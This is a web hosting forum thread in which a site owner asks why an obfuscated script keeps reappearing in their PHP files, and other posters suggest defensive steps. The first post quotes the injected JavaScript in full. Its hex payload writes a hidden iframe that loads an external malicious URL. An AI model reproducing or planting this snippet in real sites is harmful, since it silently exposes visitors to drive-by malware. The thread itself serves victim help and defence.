Results 1 to 7 of 7
  1. #1

    Unknown scrit/hacked site

    For a bit now, my site has been having probems with a script constantly being added to my index.php and header.php files, despite how many times I remove it.

    The script looks like this:

    Code:
    function v47d4354e87fa9(v47d4354e8877c){ function v47d4354e88f6e () {var v47d4354e89747=16; return v47d4354e89747;} return(parseInt(v47d4354e8877c,v47d4354e88f6e()));}function v47d4354e89f28(v47d4354e8a6f6){ function v47d4354e8be79 () {var v47d4354e8c64c=2; return v47d4354e8c64c;} var v47d4354e8aef7='';for(v47d4354e8b6a6=0; v47d4354e8b6a6<v47d4354e8a6f6.length; v47d4354e8b6a6+=v47d4354e8be79()){ v47d4354e8aef7+=(String.fromCharCode(v47d4354e87fa9(v47d4354e8a6f6.substr(v47d4354e8b6a6, v47d4354e8be79()))));}return v47d4354e8aef7;} document.write(v47d4354e89f28('3C696672616D65206E616D653D276431396633343533613027207372633D27687474703A2F2F7865706163652E636E2F7464736B612F696E6465782E706870272077696474683D323132206865696768743D323035207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));
    (with the script codes in front of it (< script >)

    any ideas how to stop this from re-appearing every time I clean my page?
    Last edited by bear; 03-11-2008 at 07:28 AM. Reason: code tags

  2. #2
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    Is this for your own dedicated server or a shared hosting account?
    Upload Guardian 2 - Malicious Upload Scanner - Windows and Linux!
    Instantly scan uploaded files
    Get notified when released

  3. #3
    Shared hosting account

  4. #4
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    Change your sites/FTP password. Make sure there are no upload scripts open to the public - also make sure any scripts you use are up to date and don't have security holes.

    Lastly ask your host for mod_security protection
    Upload Guardian 2 - Malicious Upload Scanner - Windows and Linux!
    Instantly scan uploaded files
    Get notified when released

  5. #5
    Join Date
    Mar 2008
    Location
    Sheffield, UK
    Posts
    447
    I'd backup your files and contact your host.
    If we do not plant knowledge when young, it will give us no shade when we are old.
    Lord Chesterfield

  6. #6
    Alright, thank you for your advice!

  7. #7
    What are the permissions on those files and the directory where they are stored. If the web server user has write access that could become a larger issue.

    I would also follow the advise given by Ramprage and AmyWilliams.
    Enterprise IT Professional, Former Web Hosting Tech.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •